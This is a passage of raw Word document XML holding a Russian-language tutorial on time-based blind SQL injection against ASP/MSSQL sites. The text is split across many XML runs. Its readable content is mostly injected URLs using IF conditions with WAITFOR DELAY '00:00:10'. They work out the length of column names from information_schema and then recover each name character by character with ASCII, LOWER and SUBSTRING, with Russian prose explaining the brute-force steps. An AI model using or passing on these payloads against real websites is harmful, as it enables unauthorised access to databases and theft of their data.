          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'U'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00317A2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">name != </w:t>
      </w:r>
      <w:r w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00354B8E" w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00354B8E" w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>')&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WAITFOR</w:t>
      </w:r>
      <w:r w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DELAY</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E" w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> '00:00:10'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRPr="00354B8E" w:rsidRDefault="00354B8E" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRPr="00C3573A" w:rsidRDefault="00354B8E" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>имя</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>уже</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>найденной</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>таблицы</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3573A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="00C3573A"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753818" w:rsidRDefault="0017464E" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для определения длины имени колонок конкретной таблицы можно</w:t>
      </w:r>
      <w:r w:rsidR="00753818">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> использовать такую конструкцию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753818" w:rsidRPr="00753818" w:rsidRDefault="00753818" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0017464E" w:rsidRPr="00673E72" w:rsidRDefault="0017464E" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LEN</w:t>
      </w:r>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data_base_name</w:t>
      </w:r>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>')&gt;k</w:t>
      </w:r>
      <w:r w:rsidRPr="0017464E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) WAITFOR D</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ELAY '00:00:10'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRPr="00673E72" w:rsidRDefault="00354B8E" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRPr="00354B8E" w:rsidRDefault="00354B8E" w:rsidP="00BD26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data</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - имя найденной базы данных. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753818" w:rsidRPr="00354B8E" w:rsidRDefault="00753818" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRDefault="0017464E" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>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Далее перебором определяем</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имя</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> колон</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> таблицы </w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">найденной таблицы. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRDefault="00BD26D7" w:rsidP="00BD26D7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2241"/>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17464E" w:rsidRPr="00673E72" w:rsidRDefault="0017464E" w:rsidP="00354B8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LOWER</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SUBSTRING</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP </w:t>
      </w:r>
      <w:r w:rsidR="00354B8E" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data_base_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'),</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
